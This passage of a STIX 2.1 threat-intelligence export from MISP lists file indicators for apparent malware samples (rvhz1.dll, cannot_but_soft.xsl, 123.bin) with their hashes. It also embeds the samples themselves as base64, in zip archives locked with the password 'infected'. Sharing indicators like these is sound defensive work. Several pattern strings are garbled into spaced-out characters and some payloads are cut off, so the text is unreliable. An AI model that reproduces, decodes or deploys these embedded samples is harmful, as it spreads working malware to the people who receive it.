"phase_name" : "file"
}
] ,
"labels" : [
"misp:name=\"file\"" ,
"misp:meta-category=\"file\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--513494bf-37dd-4704-a5ea-15155c29c4fc" ,
"created_by_ref" : "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f" ,
"created" : "2020-07-20T00:00:57.000Z" ,
"modified" : "2020-07-20T00:00:57.000Z" ,
"pattern" : " [ f i l e : h a s h e s . M D 5 = ' d b 91 c 4531 a a 46 c e 160 a 71 b 9 c 74 c 800 b b ' A N D f i l e : h a s h e s . S H A 1 = ' c f 45535 c 5 d 392 b f d 58 f b 385 e d b 46798 d 64793 d 98 ' A N D f i l e : h a s h e s . S H A 256 = ' 0 76547 c 290 c 80627993690 a 9e6 c 15 e e b 2 a c 9 b 86 a 9 a 33 a f 2 d 3 d b a a b 135 f 1 f 43 a b ' A N D f i l e : h a s h e s . S H A 512 = ' e f 843483 c 3 f 0 97617850 b 88146 d e 88e5758841 a 6442 d 8097483 a 0 82717 a e e f 48 c 4 b a 0 2 f 7320671378 e f d 28 a f d 1 c 1245e0207140 b e 3 c 255e7470925 d 86e3 b 1 b d 8 ' A N D f i l e : h a s h e s . S S D E E P = ' 6144 : k r M Z //+TcHKiFX1F5UsCj+2s4wsMAAJb7WjMAuk5XalWUdc2Cb:Dt+TcVFF5TUU4wtb7WgAr545e' AND file:name = 'rvhz1.dll' AND file:size = '376832' AND (file:content_ref.payload_bin = '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
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2020-07-20T00:00:57Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "file"
}
] ,
"labels" : [
"misp:name=\"file\"" ,
"misp:meta-category=\"file\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--22e9a211-22e7-45d2-9b39-33a01b5e9c69" ,
"created_by_ref" : "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f" ,
"created" : "2020-07-20T00:03:42.000Z" ,
"modified" : "2020-07-20T00:03:42.000Z" ,
"pattern" : "[file:hashes.MD5 = 'afaf378fa1d6c00d71e5a01f94fd940e' AND file:hashes.SHA1 = '5dc20661046ffa7cca66eb047ee01abc3ef935fa' AND file:hashes.SHA256 = 'f4b75d4ddcd7b9ff5d7f867d44e4b7236c69e26807b2ca8296df1981aaf336f6' AND file:name = 'cannot_but_soft.xsl' AND file:size = '7334' AND (file:content_ref.payload_bin = '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' AND file:content_ref.x_misp_filename = 'cannot_but_soft.xsl' AND file:content_ref.hashes.MD5 = 'afaf378fa1d6c00d71e5a01f94fd940e' AND file:content_ref.mime_type = 'application/zip' AND file:content_ref.encryption_algorithm = 'mime-type-indicated' AND file:content_ref.decryption_key = 'infected')]" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2020-07-20T00:03:42Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "file"
}
] ,
"labels" : [
"misp:name=\"file\"" ,
"misp:meta-category=\"file\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--7b2b9772-9059-4651-84e8-bc066e15b917" ,
"created_by_ref" : "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f" ,
"created" : "2020-08-02T18:50:54.000Z" ,
"modified" : "2020-08-02T18:50:54.000Z" ,
"pattern" : " [ f i l e : h a s h e s . M D 5 = ' 3994131 d a 9 d 0 8 a a 5 c a 8 b 4 f c 671 d 4 c 9 d b ' A N D f i l e : h a s h e s . S H A 1 = ' 55 f c 3 f 8108e5 a 563 e a 0 0 c d 3 a b c 9 a 5672 d 3 d 58 e c 5 ' A N D f i l e : h a s h e s . S H A 256 = ' e 88 d f d 4 b e f 8 c 502 e f 2 b 711 f d 0 25 a a 321244 d b c a 1 e a b 80586 b 0 7187 b 3 c f 261 d e 3 ' A N D f i l e : h a s h e s . S H A 512 = ' 0 2 f d 82498 b e f 4442 c a 0 a 6 a 5348 a 9 f 612 c 852e901522 e c 8 c 69 d 7 f 1 d f d b e 2607 c c 72 b b b 727 c 474e60314 b 1 c 5 b b 5 c 621 a 3347 b 87 b b 3 c 92 c a 2 c 194473e58 d e b f d 1 a 1 ' A N D f i l e : h a s h e s . S S D E E P = ' 6144 : B K z J k u Y H x K 6 B G i K 1 k z 6 q 3 G y + 2 G c s I U o 8 E w q b w k 9 o S p : A z r 8 j B o i j + 2 G 0 B D w k o S p ' A N D f i l e : n a m e = ' 123 . b i n ' A N D f i l e : s i z e = ' 212992 ' A N D ( f i l e : c o n t e n t _ r e f . p a y l o a d _ b i n = ' U E s D B B Q A C Q A I A B G W A l F s / c j J G + o C A A B A A w A g A B w A M z k 5 N D E z M W R h O W Q w O G F h N W N h O G I 0 Z m M 2 N z F k N G M 5 Z G J V V A k A A 4 E K J 1 + B C i d f d X g L A A E E I Q A A A A Q h A A A A R W Z I w F n 1 t I h 6 L E Y s a G L f q B T 8E2 o 8 D 9 F 51 x d + E k E W x y g H z g V d 0 5 K 3 d c n k F X i 7 + c d n b L + G y a 3 v k A 1 Z f 0 L X a o E + 5 y r m P J w u z m p 6 T B B d q l 9 w b 7 A Q V + k h F Y f 0 + 2 W k V X O M P 3 s 7 c Z + T 7 q p W C 8 n H + F K G g / d 393 L X I / g B W W F j F 9 e J d j 8 a E 3 R 514 O r m u f 6 n w f a I q Z M 2 H 5 n j D 6 h C x 1 p M g Q u I k Q / S U f T 9 S W Q L k 3 l I f U b Q / q / P 0 B b o n S J a W O 5 M 5 s e o f v g V W 46 F W P b 92 H B Z 3 y f l 4 f 9 o j 4 F s w / 3E1 X X R s b 5 y / 1e5 N A l G A Y K h G S D m Q 78 B o L U p T 1 z V z E x H z 7 J 0 s I f a W r 5 k f P v + a g Q x 7 K N x Q 4 T l c c f 6 M t h Y F 4 / Y E H N f 6 V T / N b 7 m f E m 1 P x E z M D k w Z V d / 8 y x w N U t e 9 O q l o O H g m K d C w A W + E w 9 o n 4 g U m B 0 F j P A S S O L T o f B Z g y R j o f 9 z N e 3 L D i Q h D N S X u U N T g u J t u D C I E D F I 2 m r f 9 e a T t J c / M O K Y j H U f O q W F v X J L J c C 4 t a P q F 2 N h A 9 q w K F h W O M 8 + a 6 f E e v h 9 S s 69 f + d O O 8322 o 1 U b c U G 4 W 3 Q o 1 l N K M B x Z e k U S 5 E v T 4 v Q 0 m 2 x F 0 M t L X p z A q T k Y I v t U v S j B U E J E U p L e v L z 3 L 4 F k W + F L M Z N i q 4 u f 6 W 7 + g r r F P x p 8 W q w x 5 e H 91 + / U k L U s e p C V q m X 3 r L T z 4 d i F C M Z 4 I 3 C p O b g l b 4 M C l 7 s O D p P N 6 O t E x k 7 Y e f u H C 0 p y z x t K J v I c V y W z 7 U 5 I r x K I m i C d V 483 I g V p O q Y A a M U N R H E p P x G N z k Z f / 8 J h B C s K V 8 e g H X W k 4 W p T B z b Q B s t e 6 J S K i c R i X l 1 a r G a a 4 P H O B a R K z L N J W O 2 i / d B M E a 6 k F B F h / v P 600 l Q T 5 C h V y 81 M 9 Z J u V 4 I 3 M h x o h e b F i E g r y 55 l d R 0 p X 8 K H x x O f C y V l 8 o U 2 s W + g 3 U V 3 T d Y P t Z a F U O D B 8 Q L g U v l T b l o m 7 E Q N 9 b / W 2 R c w M / F e y D x d N d E O C d i x 1 z / P x f i 6 y 5 d q 6 d 3 E C Z O F j u 1 i / u t f M r 0 a I M 60 L n L + + h a R A l r q S N O x 7 g F S Y l n m H Z Y U S 4 Y W Q 1 G 0 w o i L J / l 1 N e / B C v 6 r p A I 2 W C K + I v 5 R g F s 67 z V M W q s t P S 3 S Z a / + 47 c x G q k C M K S 9 x r I o d m K x J 5 Z M I 9 P s L p 6 x Q / w J o u Y w 4 r i 8 R p T Y d L W W 87 d P I o 8 n f G Q W G K Q c X m 5 l L T V t r x Y g A I T l Q J L X N 5 R z m k B U x O q n 6 W k L 55 M L h d V 4 W f R 1 q q + C q w o i 4 E Z 3 R e v x 3 j S P k + 2 D I o R n 7 H J F U B F 49 C y B f R P S E c f j H 3 / X P r J q O y s + 19 L A c X S u I S V m F S h c D C H 0 i 8 V 2 O 4 n I u R z z t + n n 8 c B u P 9 L K S m r A Y L e 0 R v H 8 G x M K q 4 m z 9 F O B f l T X g 0 Q X 84 j F n P E U a U k R y / 8 a A Q v m q + t 4 Z 4 F 9 G 5 W 0 y i o V E B q E u x p X H t E a 4 y B x l x R B b c 9 N t W c A X I 0 x Z R B Z G Q z a m 6 O c h 2 B z e l + k p M z + 4 Q r q C l 9 d Y 7 Q 6 D U 63 w + d x f 1 a Y j o X J + y X X J G d l i V y W x 5 f k k r h V s v z J s W R b + C L 45 e u x / K M l s 6 q L 6 x n 2 v k 6 s L q l j J o X 1 H 1 A 2 A / F y s p Y E h 4 H c U J 37 F R C w a M j W b W a Y S W f n 5 W + D L k v f B e q l b h t k 8 C L / f L N r x T C n T W e 0 n U Z b 7 D D j i e q a v Z t m D K e I o r g i y 0 z 2 C I Z 0 4 N R 7 j d o I H R y O m + u / l D O U m h N W A F m A X n 6 o S s i U 2 n e E N k U b H g b / p 1 Z f I Q K Q 8 B Z l o 6 E F + V 7 X M Z 88 K k b d Z H B G u W w k Y f N j r g G 3 B G p k r 3 k U c x T i 0 M p J y x Q V t D O T a I U J 7 o g Z A V 5 U X O 6 V c Y J B X l f w t + y p p k v 6 m 2 d / 6 D R M H W 291 g r o B m h h E H u b o W 7 S Q 2 f f J g G t o I W 1 + h N F b D y P V C Q Q 5 K N H o O H g Y 6 f D G z B l j y B / 7 y o p j 9 S K w + f Z 9 P Y U f f 1 U B Q w / S G s c X U K H o F g L M P / d R A c m D G c d z s V / 7 G L e Z i T Y a k E 7 k J w A O a d 9 u d A 86 K A y H f k 4E25 R X 3 u r c d 53 c E c 7 V A T Q e V U 3447 b T p 2 K Z U Q / J 0 O 8 m j r U Y C + N Z N j 9 P u t 3 N b M a 2 r 2 X W u R d a c C C R 4 D z G 9 V 9 s C O L q l 9 N y n l 93 f p U Y A F R A 3 I J D 61 g l 3 Q O D L P A J l 6 z g 1 c m / F N A 0 D k T P 5 F K t 55 J S z t X + r G W M V q / J 6 c G 7 V Y s 7 v e Z x r H z I G t 3 S 2 k i 9 / x c Z q 3 O a J S 9 V D 8 a D T v T t Q P e m F g Y 0 2e1 j w 2 Q g K D T u b L J 8 H T w e 0 6 Q N / n I O c W P E 37 Q d j o p k 0 M w W q Z g e R w r 7 L L m b 7 N N F D Q 220 D C 9 Z 377 h L b b 5 J D p J u e 64 k I l H w n W V v b C P s n R p o I y s + 51 p K h 9 j M 76 k U h p s r E z o s 7 A u w s k s o N 8 p l Y X m Y z x Y W X H 5 Y O P 9 + 96 Z 3 j h Y I o o d N 6 d K R o m C R j U q d S X B h y V z b Q 15 p y c i V 7 E R V A J Y 5 + r C 277 u T e J 4 F x / p I S G R q e E f L h u T 0 Z i O X F X M I Z Z U X G B a k E P t M V 0 / q n P E 9 m 8 o / V E 7 t q b X y 4 b M L p k z W 9 i B l V T b q A g e 2 C Z A G R Z l 5 S F O t H d T v R T A J C H O 8 a N 0 57 i t K o F 4 q x s 62 v x c k G x P p X D U i 6 E z N Q 53 M D O K o 0 u F v e c U 0 M c y b / K g S k 4 n l m P / M L b w T j d V + n E t q l d 73 H 66 v 9 P O X w f c f / 7 O j p L F D Z 6 Z U C V t 2 D e b 5 M x 0 l e P b c d 4 e A w n o q p e K Y q A 7 R i Y Q 0 m 8 l 456 H p + 1 i Y a z b O 9 Q 8 / 6 L m I Y I F M W r 5 X 5 m i u 99 q k 1 C R W 1 g L z d M U J F 8 K g S 1 A k d m i e n l 6 m n j c 0 B g L d l P 7 k b G I 5 K Y c Z N D E K 2 o 9 Y w Q z W W l 0 D Z L W t o 6 B Z h 5 y k L s m P d a j L F + n S Z H 1 E n N 9 K a + U k 2 C F V W n u l r 4 w D K b L 2 S A 7 f d G A / Q j A z 5 W m 0 u k s 32 v A P I m l J p S e k f X l m l l g v N S C K g 8 b D Z x 3 f g 3 G S Y G r o l N Q R B P l H F u N 5 b 9 K K 4 T R k h I n q w X 8 Q r K 3 Z P u / o 0 K 8 + a J 6 K H R 11 i 4 + e q Z O / b h P U H t 2 c M N v N d w a g X R D b I t 0 3 j 2 Y l / C Z B 7 E c m y H K o E E H D / 6 q f b n n G m J a a P h F m l t U C e j x 0 v D B t q R w E + L g x 8 z i 7 N c J a M F B K y e s x a r P p q t C 5 g 4 i u 1 J / t + w T T x l 95 M z k V 9 A l 1 Q P s 4 u P 3 h o S / Y h o P B 807 z D / u k I 59 t y 8 b E b R K l n X q r W C U V v J + t 8 N W 4 L 7 C s t 3 w + b 9 A x d S 2 s k x a T v 2 x Y P L 3 r a f p X b v 2 G C n K F H x K A h e u G U X p r 1 U B S h + 4 o t S O D L S 1 x v + z o E L 6 f l R 7 x p h f J M i l g D b 8 h H E j Q I N D w S q L N K + b w E O l Y e 8 X Z V Q / x X V n l h 7 C A H Z N t d D 1 Z 36 l r a / + y u v W v b V a L 9 z A m U 8 Z r 1 q T A j Y D z n P M m d 3 h P z 6 t 4 O O A G P E X W / M p p I l a 6 y v 8 L B z o s L 3 b H / t J z p t o w 3 s u K D b q P c W R 6 s j N a U P O c V 9 P Y / 5 u p q e X q d G a 1 P N z i S T l t O P 7 e y + d e Y 9 P X T h Z W q 8 V X 682 Y t U U v i K I p w s R w C P O A g w f j H z M 6 / J j w W Q Q T D V w / T f g P b P x A u + 4 s E z s p e t i a j s b U w p P F I 7 y r a H B 7 k P s q o 54 n b L o + i P 4 O g l Q v T
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2020-08-02T18:50:54Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "file"
}
] ,
"labels" : [
"misp:name=\"file\"" ,
"misp:meta-category=\"file\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--63b24626-a14c-4bf1-951d-fd726a7fdac2" ,
"created_by_ref" : "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f" ,
"created" : "2020-08-02T18:50:54.000Z" ,
"modified" : "2020-08-02T18:50:54.000Z" ,
"pattern" : " [ f i l e : h a s h e s . M D 5 = ' 3994131 d a 9 d 0 8 a a 5 c a 8 b 4 f c 671 d 4 c 9 d b ' A N D f i l e : h a s h e s . S H A 1 = ' 55 f c 3 f 8108e5 a 563 e a 0 0 c d 3 a b c 9 a 5672 d 3 d 58 e c 5 ' A N D f i l e : h a s h e s . S H A 256 = ' e 88 d f d 4 b e f 8 c 502 e f 2 b 711 f d 0 25 a a 321244 d b c a 1 e a b 80586 b 0 7187 b 3 c f 261 d e 3 ' A N D f i l e : h a s h e s . S H A 512 = ' 0 2 f d 82498 b e f 4442 c a 0 a 6 a 5348 a 9 f 612 c 852e901522 e c 8 c 69 d 7 f 1 d f d b e 2607 c c 72 b b b 727 c 474e60314 b 1 c 5 b b 5 c 621 a 3347 b 87 b b 3 c 92 c a 2 c 194473e58 d e b f d 1 a 1 ' A N D f i l e : h a s h e s . S S D E E P = ' 6144 : B K z J k u Y H x K 6 B G i K 1 k z 6 q 3 G y + 2 G c s I U o 8 E w q b w k 9 o S p : A z r 8 j B o i j + 2 G 0 B D w k o S p ' A N D f i l e : n a m e = ' 123 . b i n ' A N D f i l e : s i z e = ' 212992 ' A N D ( f i l e : c o n t e n t _ r e f . p a y l o a d _ b i n = ' U E s D B B Q A C Q A I A C W W A l F s / c j J G + o C A A B A A w A g A B w A M z k 5 N D E z M W R h O W Q w O G F h N W N h O G I 0 Z m M 2 N z F k N G M 5 Z G J V V A k A A 6 Y K J 1 + m C i d f d X g L A A E E I Q A A A A Q h A A A A A 6 x M W e 1 l a m A + t Z T d 8 U P w H V 53 v r W B V D k 7 k i k 36 v f l 2 N m W b B F 7 h t C C q H p R F a r Q o u J O z 0 / E q q R C H 3 v d S K I 38 H a 4 H g Z V q D v g 9 b l q G X + 0 F S C 23 M 9 y q Y S r + R x u q Z 3 y W k g l q c j 36 e / 6 V 0 y b S N W + 4 F f p k j f v K + H B 7 m n e T l C B a v w a L C Q e H c y w h D s 3 h 4 y q / t t 2 X b M s w z A L f V J r r D S D y r o / O m W O m q i t H L G U l C R O i K 39 V f G F Y A o V Q u K 9 A t p p j y K q d 6 V z n R v H V Z v c 7 D w g A g h v b B K / b S P 0 D A 7 R F Q 76 P O 4 B T Z Y L p o 3 h x V b T q l D Z r z U C k w S K 4 T F P 6 O 4 z j z a N I D b g g m W X + I p P k J 4 A P C 2 n b x E + q j k 87 d x X 0 a t a A 9 q B L 6 d S v S M P o 485 y T v c U C 3 t F C g X N O h 6 g 2 V 88 o N H 1 M V 1 h f i G 4 D h Y Q D e I d j 5 U M 0 q D u s P x N 0 V L z 9 i i 4 a v i p M 3 Z V + e Z O g o 73 Y x t 7 W g c 4 N R G 3 p T o X N j T 9 / 2 k 49 t g i c C W 0 V 7 e c f K y Z L y U 46 S 1 A d c 1 v n X q + F G N V t U V a O X j 6 A G m g 1 O w D 7 B L O 0 Q 4 r y L u h U A k q z o F v T y 2 Z / c M 3 x W S v J u V D F 0 a H N m y S s t S q a G M h B y / 6 u D H 5 J 0 l w e j R Y T k + 3 m J 8 j n Q T E j A z k / f p A C x 